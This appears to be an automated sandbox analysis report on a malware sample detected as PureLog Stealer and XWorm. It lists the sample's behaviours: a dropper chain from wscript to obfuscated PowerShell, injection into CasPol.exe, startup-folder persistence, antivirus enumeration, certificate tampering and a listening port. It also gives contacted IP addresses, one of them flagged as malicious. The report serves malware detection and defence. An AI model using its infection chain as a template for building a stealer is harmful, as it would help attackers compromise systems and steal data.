Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B3019C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF681B3019C
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Adds / modifies Windows certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 18.2.powershell.exe.1af29b22f88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.1af314e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.1af29b22f88.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.1af314e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2481504661.000001AF314E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.1728472486.000001AF2930E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected XWorm
Source: Yara match File source: 125.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 113.2.powershell.exe.237b3bb2660.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000007D.00000002.2600075638.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000071.00000002.2463346324.00000237B3BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Searches for user specific document files
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\sys Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\sys
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\sys
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\pow
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\pow
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\pow
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\32
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\32
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\sys
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\32
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\32
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\Public\Documents\pow

Remote Access Functionality
barindex
Yara detected PureLog Stealer
Source: Yara match File source: 18.2.powershell.exe.1af29b22f88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.1af314e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.1af29b22f88.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.powershell.exe.1af314e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2481504661.000001AF314E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.1728472486.000001AF2930E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected XWorm
Source: Yara match File source: 125.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 113.2.powershell.exe.237b3bb2660.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 113.2.powershell.exe.237b3bb2660.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000007D.00000002.2600075638.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000071.00000002.2463346324.00000237B3BB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681B16A30 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00007FF681B16A30
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Code function: 0_2_00007FF681AD1DF0 bind, 0_2_00007FF681AD1DF0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1518119 Sample: TM3utH2CsU.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 133 Found malware configuration 2->133 135 Malicious sample detected (through community Yara rule) 2->135 137 Antivirus detection for URL or domain 2->137 139 18 other signatures 2->139 10 TM3utH2CsU.exe 16 2->10         started        15 cmd.exe 2->15         started        17 wscript.exe 2->17         started        19 4 other processes 2->19 process3 dnsIp4 123 143.198.209.174 LDCOMNETFR United States 10->123 113 C:\Users\user\AppData\...\start_sys.bat, DOS 10->113 dropped 115 C:\Users\user\AppData\...\start_pow.bat, DOS 10->115 dropped 117 C:\Users\user\AppData\...\start_32.bat, DOS 10->117 dropped 119 3 other malicious files 10->119 dropped 175 Drops script or batch files to the startup folder 10->175 21 cmd.exe 10->21         started        23 cmd.exe 2 2 10->23         started        25 cmd.exe 10->25         started        34 10 other processes 10->34 27 wscript.exe 15->27         started        30 conhost.exe 15->30         started        177 Suspicious powershell command line found 17->177 179 Wscript starts Powershell (via cmd or directly) 17->179 36 2 other processes 17->36 32 wscript.exe 19->32         started        38 5 other processes 19->38 file5 signatures6 process7 signatures8 40 wscript.exe 21->40         started        44 conhost.exe 21->44         started        48 2 other processes 23->48 50 2 other processes 25->50 165 Suspicious powershell command line found 27->165 167 Wscript starts Powershell (via cmd or directly) 27->167 52 2 other processes 27->52 46 powershell.exe 32->46         started        169 Uses ping.exe to check the status of other devices and networks 34->169 54 17 other processes 34->54 171 Uses ping.exe to sleep 36->171 56 5 other processes 36->56 173 Obfuscated command line found 38->173 58 5 other processes 38->58 process9 file10 111 C:\Users\user\AppData\...\escrivan.vbs, Unicode 40->111 dropped 143 Suspicious powershell command line found 40->143 145 Wscript starts Powershell (via cmd or directly) 40->145 147 Windows Shell Script Host drops VBS files 40->147 60 powershell.exe 40->60         started        63 cmd.exe 40->63         started        149 Obfuscated command line found 46->149 69 2 other processes 46->69 151 Drops VBS files to the startup folder 48->151 153 Bypasses PowerShell execution policy 48->153 155 Windows Scripting host queries suspicious COM object (likely to drop second stage) 48->155 157 Suspicious execution chain found 48->157 65 powershell.exe 48->65         started        71 2 other processes 50->71 159 Uses ping.exe to sleep 52->159 73 5 other processes 52->73 75 8 other processes 54->75 161 Writes to foreign memory regions 56->161 163 Injects a PE file into a foreign processes 56->163 67 CasPol.exe 56->67         started        77 2 other processes 58->77 signatures11 process12 signatures13 181 Suspicious powershell command line found 60->181 183 Obfuscated command line found 60->183 79 powershell.exe 60->79         started        82 conhost.exe 60->82         started        185 Wscript starts Powershell (via cmd or directly) 63->185 187 Uses ping.exe to sleep 63->187 90 3 other processes 63->90 189 Found suspicious powershell code related to unpacking or dynamic code loading 65->189 93 2 other processes 65->93 84 powershell.exe 71->84         started        95 4 other processes 71->95 191 Writes to foreign memory regions 73->191 193 Injects a PE file into a foreign processes 73->193 86 CasPol.exe 73->86         started        88 powershell.exe 75->88         started        97 15 other processes 75->97 process14 dnsIp15 195 Writes to foreign memory regions 79->195 197 Injects a PE file into a foreign processes 79->197 99 CasPol.exe 79->99         started        102 CasPol.exe 79->102         started        105 CasPol.exe 84->105         started        107 CasPol.exe 84->107         started        109 CasPol.exe 88->109         started        125 127.0.0.1 unknown unknown 90->125 127 207.241.227.240 INTERNET-ARCHIVEUS United States 93->127 129 188.114.96.3 CLOUDFLARENETUS European Union 93->129 199 Creates autostart registry keys with suspicious values (likely registry only malware) 93->199 131 23.47.168.24 AKAMAI-ASUS United States 97->131 signatures16 process17 dnsIp18 141 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 99->141 121 135.224.23.113 LUCENT-CIOUS United States 102->121 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
23.47.168.24
 unknown United States
16625 AKAMAI-ASUS false
143.198.209.174
 unknown United States
15557 LDCOMNETFR false
188.114.96.3
 unknown European Union
13335 CLOUDFLARENETUS false
207.241.227.240
 unknown United States
7941 INTERNET-ARCHIVEUS false
135.224.23.113
 unknown United States
10455 LUCENT-CIOUS true

Private

IP
127.0.0.1

Contacted URLs

Name Malicious Antivirus Detection Reputation
135.224.23.113 true
  • Avira URL Cloud: safe
 unknown